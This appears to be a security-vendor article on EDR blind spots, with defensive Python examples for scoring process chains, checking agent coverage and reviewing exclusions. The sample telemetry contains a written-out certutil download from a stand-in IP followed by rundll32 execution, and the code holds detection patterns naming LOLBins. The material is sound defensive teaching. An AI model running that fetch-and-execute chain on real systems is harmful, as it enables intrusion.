Deploying an endpoint detection and response solution across your estate is a significant security improvement. But EDR isn’t a magic shield. Like every security tool, it has limitations, gaps, and scenarios where it fails to detect or prevent malicious activity.
Understanding those limitations helps you build layered defences rather than relying on a single product to catch everything.
Living Off the Land
Attackers increasingly use legitimate system tools to carry out malicious actions. PowerShell, WMI, certutil, mshta, and dozens of other built-in Windows utilities can download files, execute code, and move laterally through networks. Because these tools are signed, ship with the operating system and are used daily by administrators, an EDR product cannot simply block them; it has to tell malicious usage from administrative activity by looking at the command-line arguments, the parent process, and what the tool goes on to do, and that distinction is never clean.
William Fieldhouse, Director of Aardwolf Security Ltd, comments: “Endpoint detection and response tools are powerful, but they have blind spots. During internal assessments, we routinely bypass EDR products using techniques that abuse legitimate system tools, living-off-the-land binaries, and process injection methods that EDR vendors are still catching up with.”
The most effective attacks chain multiple legitimate tools together: a document spawns a shell, the shell fetches a file with certutil, and rundll32 executes it. Each individual action looks benign, and alerting on any one of them in isolation would drown a SOC in false positives. The malicious intent only becomes apparent when you view the full chain, which requires correlating process ancestry, command lines and network activity over time, the kind of behavioural analysis that not all EDR products perform effectively.
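As an added example (not code from the article or from Aardwolf Security), the following Python scores constructed, Sysmon-style process-creation records: first each event on its own, then the whole ancestry chain. The field names, indicator patterns, weights and the alert threshold are assumptions chosen to illustrate the point; no single event reaches the threshold, but the chain does, while the same certutil binary run by an administrator from a console scores nothing.

```python
"""Score process-creation events for LOLBin abuse, then correlate them into chains.

Added example, not from the article. SAMPLE_EVENTS are constructed, Sysmon-style
process-creation records; the field names, indicator patterns and weights are
assumptions for illustration, not any vendor's telemetry schema or rule set.
"""
import re

# Constructed telemetry: one process-creation record per dict (root first).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "winword.exe",  "cmd": "winword.exe invoice.docm"},
    {"pid": 300, "ppid": 200, "image": "cmd.exe",
     "cmd": "cmd.exe /c certutil -urlcache -split -f http://203.0.113.7/a.txt C:\\Users\\Public\\a.txt"},
    {"pid": 400, "ppid": 300, "image": "certutil.exe",
     "cmd": "certutil -urlcache -split -f http://203.0.113.7/a.txt C:\\Users\\Public\\a.txt"},
    {"pid": 500, "ppid": 300, "image": "rundll32.exe", "cmd": "rundll32 C:\\Users\\Public\\a.txt,Start"},
    # Benign administrative use of the same binary from an interactive console.
    {"pid": 600, "ppid": 100, "image": "cmd.exe",      "cmd": "cmd.exe"},
    {"pid": 700, "ppid": 600, "image": "certutil.exe", "cmd": "certutil -hashfile C:\\setup.exe SHA256"},
]

# Per-event indicators: (pattern over the command line, weight). Each is only
# mildly suspicious on its own; administrators trigger them too.
INDICATORS = [
    (re.compile(r"certutil.*-urlcache", re.I), 2),
    (re.compile(r"mshta.*https?://", re.I), 2),
    (re.compile(r"powershell.*(-enc\b|-encodedcommand)", re.I), 2),
    (re.compile(r"rundll32.*\\Users\\", re.I), 2),
    (re.compile(r"https?://", re.I), 1),
]
# Parent/child pairs an administrator rarely produces but a malicious document does.
ODD_PARENTS = {("winword.exe", "cmd.exe"), ("winword.exe", "powershell.exe"), ("excel.exe", "cmd.exe")}
ALERT_THRESHOLD = 5

def score_event(event):
    """Score one event from its command line alone (no context)."""
    return sum(weight for pattern, weight in INDICATORS if pattern.search(event["cmd"]))

def ancestry(events, pid):
    """Walk ppid links from pid up to the root; returns the chain root-first."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)          # guard against PID reuse producing a cycle
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))

def score_chain(events, pid):
    """Score the whole ancestry of pid: per-event scores plus odd parent/child pairs."""
    chain = ancestry(events, pid)
    total = sum(score_event(e) for e in chain)
    for parent, child in zip(chain, chain[1:]):
        if (parent["image"].lower(), child["image"].lower()) in ODD_PARENTS:
            total += 3
    return total, [e["image"] for e in chain]

def suspicious_chains(events, threshold=ALERT_THRESHOLD):
    """Map leaf pid -> (score, chain) for every chain at or above the threshold."""
    flagged = {}
    for event in events:
        score, chain = score_chain(events, event["pid"])
        if score >= threshold:
            flagged[event["pid"]] = (score, chain)
    return flagged

if __name__ == "__main__":
    print("max single-event score:", max(score_event(e) for e in SAMPLE_EVENTS))
    for pid, (score, chain) in suspicious_chains(SAMPLE_EVENTS).items():
        print(pid, score, " -> ".join(chain))
```

Run as a script it prints a maximum single-event score of 3 (below the threshold of 5) and then flags the three processes under the Word document (the shell, the certutil download and the rundll32 execution) with chain scores of 6, 9 and 8. The real work in production is the ancestry lookup across hosts and time, which is exactly the correlation the article says weaker EDR products skip.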

Coverage Gaps in Your Fleet
EDR only protects devices where it’s installed and running. Unmanaged devices, BYOD endpoints, IoT devices, and legacy systems that can’t run modern agents create gaps in your coverage. An attacker who compromises an unprotected device on your network has a foothold that your EDR can’t see.
Maintain an accurate asset inventory and reconcile EDR coverage against it, not just at rollout but continuously. Any device on your network without EDR coverage represents a potential blind spot, and so does a device whose agent is installed but has stopped reporting: an agent that has been disabled or tampered with produces exactly the same silence as one that was never deployed.
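An added example, not from the article: a Python reconciliation of a constructed asset inventory against a constructed EDR agent export. It normalises hostnames (FQDN versus short name is the usual reason the two lists fail to match) and treats an agent that has not checked in for seven days as uncovered. The column names, the pinned timestamp and the seven-day window are assumptions.

```python
"""Reconcile an asset inventory against EDR agent check-ins.

Added example, not from the article. Both CSV exports are constructed; the column
names, the fixed NOW timestamp and the seven-day staleness window are assumptions.
"""
import csv
import io
from datetime import datetime, timedelta, timezone

# Constructed inventory export (CMDB, network scan, purchasing, whatever you have).
INVENTORY_CSV = """hostname,owner,type
WS-FIN-01.corp.example,finance,workstation
ws-fin-02.corp.example,finance,workstation
SRV-DB-01.corp.example,platform,server
PRN-LOBBY-1.corp.example,facilities,printer
"""

# Constructed EDR console export: agent hostname and last check-in time.
EDR_AGENTS_CSV = """hostname,last_seen
ws-fin-01,2024-05-20T08:15:00Z
srv-db-01,2024-04-30T23:10:00Z
ws-contractor-9,2024-05-20T09:00:00Z
"""

NOW = datetime(2024, 5, 20, 12, 0, tzinfo=timezone.utc)  # pinned so the output is reproducible
STALE_AFTER = timedelta(days=7)

def norm(hostname):
    """Short lower-case name: inventories and EDR consoles rarely agree on FQDN vs NetBIOS."""
    return hostname.strip().lower().split(".")[0]

def parse_inventory(text):
    return {norm(row["hostname"]): row for row in csv.DictReader(io.StringIO(text))}

def parse_agents(text):
    agents = {}
    for row in csv.DictReader(io.StringIO(text)):
        ts = row["last_seen"].replace("Z", "+00:00")   # fromisoformat needs an explicit offset on 3.10 and earlier
        agents[norm(row["hostname"])] = datetime.fromisoformat(ts)
    return agents

def coverage_report(inventory, agents, now=NOW, stale_after=STALE_AFTER):
    """Four buckets: no agent at all, agent gone quiet, agent on a host nobody inventoried, covered."""
    missing = sorted(h for h in inventory if h not in agents)
    stale = sorted(h for h, seen in agents.items() if h in inventory and now - seen > stale_after)
    unknown = sorted(h for h in agents if h not in inventory)
    covered = sorted(h for h in inventory if h in agents and h not in stale)
    return {"missing": missing, "stale": stale, "unknown": unknown, "covered": covered}

if __name__ == "__main__":
    report = coverage_report(parse_inventory(INVENTORY_CSV), parse_agents(EDR_AGENTS_CSV))
    for bucket, hosts in report.items():
        print(f"{bucket:8} {', '.join(hosts) or '-'}")
```

The "unknown" bucket is worth as much attention as "missing": an agent reporting from a host that is not in the inventory means the inventory is wrong, and an inventory you cannot trust makes every other coverage number meaningless.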
Configuration and Tuning Matter
Out-of-the-box EDR configurations balance security with usability. Many organisations leave default settings unchanged, missing opportunities to enable more aggressive detection rules that suit their environment.
Tune your EDR based on your environment's normal behaviour patterns. Enable additional detection modules as your team's ability to handle alerts matures. And regularly review which exclusions have been added, because every exclusion is a potential gap an attacker can exploit: an excluded user-writable directory, a process excluded by name alone, or an excluded executable file extension hands the attacker a place where their payload is never inspected.
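An added example (not the article's code, and not tied to any particular product): a Python review of a constructed exclusion export that ranks each exclusion by how much an attacker gains from it. The export format, the kinds and the risk rules are assumptions; adapt them to whatever your EDR console actually exports.

```python
"""Rank entries of an exported EDR/AV exclusion list by how much an attacker gains.

Added example, not from the article and not tied to a specific product. EXCLUSIONS
is a constructed export; the kinds, prefixes and rules are assumptions.
"""
import re

# Constructed export: (kind, value), using the common path / process / extension split.
EXCLUSIONS = [
    ("path", "C:\\Program Files\\BackupAgent\\"),
    ("path", "C:\\Users\\*\\AppData\\Local\\Temp\\"),
    ("path", "D:\\"),
    ("process", "powershell.exe"),
    ("process", "bkagent.exe"),
    ("process", "C:\\Program Files\\BackupAgent\\bkagent.exe"),
    ("extension", ".log"),
    ("extension", ".exe"),
]

USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\windows\\temp", "c:\\programdata\\")
LOLBINS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "msbuild.exe"}
EXEC_EXTS = {".exe", ".dll", ".ps1", ".vbs", ".js", ".hta", ".scr", ".bat", ".cmd"}
SEVERITY_ORDER = {"critical": 3, "high": 2, "medium": 1, "low": 0, "unknown": 0}

def assess(kind, value):
    """Return (severity, reason) for one exclusion."""
    v = value.lower().rstrip("\\")
    if kind == "path":
        if re.fullmatch(r"[a-z]:", v):
            return "critical", "whole drive excluded"
        if v.startswith(USER_WRITABLE_PREFIXES) or "\\appdata\\" in v + "\\":
            return "high", "user-writable location: any user can drop a payload here"
        if "*" in v:
            return "medium", "wildcard path: check what it actually expands to"
        return "low", "vendor directory; confirm its ACL stops non-admins writing to it"
    if kind == "process":
        name = v.rsplit("\\", 1)[-1]
        if name in LOLBINS:
            return "critical", "built-in tool excluded by name: everything it runs goes unscanned"
        if "\\" not in v:
            return "high", "name-only exclusion: any binary with this name, anywhere, is trusted"
        return "low", "full-path process exclusion; confirm the path is not user-writable"
    if kind == "extension":
        if v in EXEC_EXTS:
            return "critical", "executable content excluded by extension"
        return "low", "non-executable extension"
    return "unknown", "unrecognised exclusion kind"

def review(exclusions):
    """Assess every exclusion; returns (kind, value, severity, reason) tuples, worst first."""
    rows = [(kind, value, *assess(kind, value)) for kind, value in exclusions]
    return sorted(rows, key=lambda r: SEVERITY_ORDER[r[2]], reverse=True)

def worst(exclusions):
    """Highest severity present, for a quick pass/fail gate."""
    return max((assess(k, v)[0] for k, v in exclusions), key=SEVERITY_ORDER.get, default="low")

if __name__ == "__main__":
    for kind, value, severity, reason in review(EXCLUSIONS):
        print(f"{severity:8} {kind:9} {value!r}: {reason}")
```

The name-only process exclusion is the one most often waved through: "bkagent.exe" reads as the backup agent, but the exclusion applies to any file called bkagent.exe, including one an attacker copies into their own directory. Exclude by full path, and then check who can write to that path.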
Testing EDR Effectiveness
Regular internal network penetration testing exercises your EDR against real-world attack techniques. The results show exactly what your EDR catches, what it misses, and what it detects but fails to prevent, and each of those outcomes needs a different follow-up: a miss needs a new detection, a detect-only result needs a prevention policy, and a catch needs confirmation that somebody actually triaged the alert in a useful time.
Combining penetration testing with ongoing vulnerability scanning services helps ensure that both your detection tools and the underlying systems they protect remain properly configured and up to date. EDR is most effective as part of a layered security approach, not as a standalone solution.